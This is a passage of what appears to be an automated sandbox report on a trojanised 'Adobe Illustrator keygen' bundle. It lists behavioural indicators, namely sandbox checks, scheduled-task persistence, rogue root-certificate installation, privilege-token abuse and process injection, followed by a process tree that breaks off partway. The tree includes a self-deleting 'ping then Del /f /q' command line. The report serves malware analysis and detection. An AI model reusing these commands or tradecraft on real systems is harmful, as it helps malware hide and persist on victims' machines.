\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 197.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 197.tmp.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4660 schtasks.exe 6128 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6784 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 4 IoCs
pid Process 4212 taskkill.exe 4340 taskkill.exe 5596 taskkill.exe 5944 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 2776 PING.EXE 2668 PING.EXE 4596 PING.EXE 5332 PING.EXE 5016 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4380 1615300158282.exe 4380 1615300158282.exe 2448 1615300163140.exe 2448 1615300163140.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4104 1615300168374.exe 4104 1615300168374.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4620 multitimer.exe 4204 file.exe 4204 file.exe 4724 197.tmp.exe 4724 197.tmp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 936 msiexec.exe Token: SeIncreaseQuotaPrivilege 936 msiexec.exe Token: SeSecurityPrivilege 2104 msiexec.exe Token: SeCreateTokenPrivilege 936 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 936 msiexec.exe Token: SeLockMemoryPrivilege 936 msiexec.exe Token: SeIncreaseQuotaPrivilege 936 msiexec.exe Token: SeMachineAccountPrivilege 936 msiexec.exe Token: SeTcbPrivilege 936 msiexec.exe Token: SeSecurityPrivilege 936 msiexec.exe Token: SeTakeOwnershipPrivilege 936 msiexec.exe Token: SeLoadDriverPrivilege 936 msiexec.exe Token: SeSystemProfilePrivilege 936 msiexec.exe Token: SeSystemtimePrivilege 936 msiexec.exe Token: SeProfSingleProcessPrivilege 936 msiexec.exe Token: SeIncBasePriorityPrivilege 936 msiexec.exe Token: SeCreatePagefilePrivilege 936 msiexec.exe Token: SeCreatePermanentPrivilege 936 msiexec.exe Token: SeBackupPrivilege 936 msiexec.exe Token: SeRestorePrivilege 936 msiexec.exe Token: SeShutdownPrivilege 936 msiexec.exe Token: SeDebugPrivilege 936 msiexec.exe Token: SeAuditPrivilege 936 msiexec.exe Token: SeSystemEnvironmentPrivilege 936 msiexec.exe Token: SeChangeNotifyPrivilege 936 msiexec.exe Token: SeRemoteShutdownPrivilege 936 msiexec.exe Token: SeUndockPrivilege 936 msiexec.exe Token: SeSyncAgentPrivilege 936 msiexec.exe Token: SeEnableDelegationPrivilege 936 msiexec.exe Token: SeManageVolumePrivilege 936 msiexec.exe Token: SeImpersonatePrivilege 936 msiexec.exe Token: SeCreateGlobalPrivilege 936 msiexec.exe Token: SeCreateTokenPrivilege 936 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 936 msiexec.exe Token: SeLockMemoryPrivilege 936 msiexec.exe Token: SeIncreaseQuotaPrivilege 936 msiexec.exe Token: SeMachineAccountPrivilege 936 msiexec.exe Token: SeTcbPrivilege 936 msiexec.exe Token: SeSecurityPrivilege 936 msiexec.exe Token: SeTakeOwnershipPrivilege 936 msiexec.exe Token: SeLoadDriverPrivilege 936 msiexec.exe Token: SeSystemProfilePrivilege 936 msiexec.exe Token: SeSystemtimePrivilege 936 msiexec.exe Token: SeProfSingleProcessPrivilege 936 msiexec.exe Token: SeIncBasePriorityPrivilege 936 msiexec.exe Token: SeCreatePagefilePrivilege 936 msiexec.exe Token: SeCreatePermanentPrivilege 936 msiexec.exe Token: SeBackupPrivilege 936 msiexec.exe Token: SeRestorePrivilege 936 msiexec.exe Token: SeShutdownPrivilege 936 msiexec.exe Token: SeDebugPrivilege 936 msiexec.exe Token: SeAuditPrivilege 936 msiexec.exe Token: SeSystemEnvironmentPrivilege 936 msiexec.exe Token: SeChangeNotifyPrivilege 936 msiexec.exe Token: SeRemoteShutdownPrivilege 936 msiexec.exe Token: SeUndockPrivilege 936 msiexec.exe Token: SeSyncAgentPrivilege 936 msiexec.exe Token: SeEnableDelegationPrivilege 936 msiexec.exe Token: SeManageVolumePrivilege 936 msiexec.exe Token: SeImpersonatePrivilege 936 msiexec.exe Token: SeCreateGlobalPrivilege 936 msiexec.exe Token: SeCreateTokenPrivilege 936 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 936 msiexec.exe Token: SeLockMemoryPrivilege 936 msiexec.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 936 msiexec.exe 4636 chashepro3.tmp 3472 IBInstaller_97039.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 5036 3zghjt3qmqe.tmp 3636 vict.tmp 5204 certreq.exe 5800 app.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
pid Process 3468 Setup.exe 2084 AD754B4D3FE2C4EE.exe 3884 AD754B4D3FE2C4EE.exe 4284 firefox.exe 4380 1615300158282.exe 4288 firefox.exe 2448 1615300163140.exe 4516 firefox.exe 4104 1615300168374.exe 4992 3zghjt3qmqe.exe 5036 3zghjt3qmqe.tmp 1096 vpn.exe 4244 askinstall24.exe 4232 chashepro3.exe 5084 IBInstaller_97039.exe 4344 vict.exe 4636 chashepro3.tmp 4348 vpn.tmp 3472 IBInstaller_97039.tmp 3636 vict.tmp 4696 Brava.exe 4484 chrome_proxy.exe 5736 winlthst.exe 5780 ThunderFW.exe 5800 app.exe 5848 wimapi.exe 6084 2oo0xwkdvse.exe 6112 2oo0xwkdvse.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1232 wrote to memory of 2040 1232 adobe_illustrator_keygen_by_KeygenNinja.exe 78 PID 1232 wrote to memory of 2040 1232 adobe_illustrator_keygen_by_KeygenNinja.exe 78 PID 1232 wrote to memory of 2040 1232 adobe_illustrator_keygen_by_KeygenNinja.exe 78 PID 2040 wrote to memory of 3936 2040 cmd.exe 81 PID 2040 wrote to memory of 3936 2040 cmd.exe 81 PID 2040 wrote to memory of 3936 2040 cmd.exe 81 PID 2040 wrote to memory of 1368 2040 cmd.exe 82 PID 2040 wrote to memory of 1368 2040 cmd.exe 82 PID 2040 wrote to memory of 1368 2040 cmd.exe 82 PID 2040 wrote to memory of 1548 2040 cmd.exe 83 PID 2040 wrote to memory of 1548 2040 cmd.exe 83 PID 2040 wrote to memory of 1548 2040 cmd.exe 83 PID 2040 wrote to memory of 3212 2040 cmd.exe 84 PID 2040 wrote to memory of 3212 2040 cmd.exe 84 PID 2040 wrote to memory of 3212 2040 cmd.exe 84 PID 1548 wrote to memory of 196 1548 keygen-step-3.exe 87 PID 1548 wrote to memory of 196 1548 keygen-step-3.exe 87 PID 1548 wrote to memory of 196 1548 keygen-step-3.exe 87 PID 3936 wrote to memory of 2628 3936 keygen-pr.exe 86 PID 3936 wrote to memory of 2628 3936 keygen-pr.exe 86 PID 3936 wrote to memory of 2628 3936 keygen-pr.exe 86 PID 3212 wrote to memory of 3468 3212 keygen-step-4.exe 85 PID 3212 wrote to memory of 3468 3212 keygen-step-4.exe 85 PID 3212 wrote to memory of 3468 3212 keygen-step-4.exe 85 PID 196 wrote to memory of 2776 196 cmd.exe 89 PID 196 wrote to memory of 2776 196 cmd.exe 89 PID 196 wrote to memory of 2776 196 cmd.exe 89 PID 2628 wrote to memory of 1460 2628 key.exe 90 PID 2628 wrote to memory of 1460 2628 key.exe 90 PID 2628 wrote to memory of 1460 2628 key.exe 90 PID 3468 wrote to memory of 936 3468 Setup.exe 91 PID 3468 wrote to memory of 936 3468 Setup.exe 91 PID 3468 wrote to memory of 936 3468 Setup.exe 91 PID 2104 wrote to memory of 3940 2104 msiexec.exe 93 PID 2104 wrote to memory of 3940 2104 msiexec.exe 93 PID 2104 wrote to memory of 3940 2104 msiexec.exe 93 PID 3468 wrote to memory of 2084 3468 Setup.exe 94 PID 3468 wrote to memory of 2084 3468 Setup.exe 94 PID 3468 wrote to memory of 2084 3468 Setup.exe 94 PID 3468 wrote to memory of 3884 3468 Setup.exe 95 PID 3468 wrote to memory of 3884 3468 Setup.exe 95 PID 3468 wrote to memory of 3884 3468 Setup.exe 95 PID 3468 wrote to memory of 1720 3468 Setup.exe 96 PID 3468 wrote to memory of 1720 3468 Setup.exe 96 PID 3468 wrote to memory of 1720 3468 Setup.exe 96 PID 3212 wrote to memory of 208 3212 keygen-step-4.exe 97 PID 3212 wrote to memory of 208 3212 keygen-step-4.exe 97 PID 3212 wrote to memory of 208 3212 keygen-step-4.exe 97 PID 1720 wrote to memory of 2668 1720 cmd.exe 101 PID 1720 wrote to memory of 2668 1720 cmd.exe 101 PID 1720 wrote to memory of 2668 1720 cmd.exe 101 PID 208 wrote to memory of 4168 208 askinstall20.exe 102 PID 208 wrote to memory of 4168 208 askinstall20.exe 102 PID 208 wrote to memory of 4168 208 askinstall20.exe 102 PID 4168 wrote to memory of 4212 4168 cmd.exe 104 PID 4168 wrote to memory of 4212 4168 cmd.exe 104 PID 4168 wrote to memory of 4212 4168 cmd.exe 104 PID 3884 wrote to memory of 4272 3884 AD754B4D3FE2C4EE.exe 105 PID 3884 wrote to memory of 4272 3884 AD754B4D3FE2C4EE.exe 105 PID 3884 wrote to memory of 4272 3884 AD754B4D3FE2C4EE.exe 105 PID 2084 wrote to memory of 4284 2084 AD754B4D3FE2C4EE.exe 106 PID 2084 wrote to memory of 4284 2084 AD754B4D3FE2C4EE.exe 106 PID 2084 wrote to memory of 4284 2084 AD754B4D3FE2C4EE.exe 106 PID 2084 wrote to memory of 4284 2084 AD754B4D3FE2C4EE.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\adobe_illustrator_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\adobe_illustrator_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
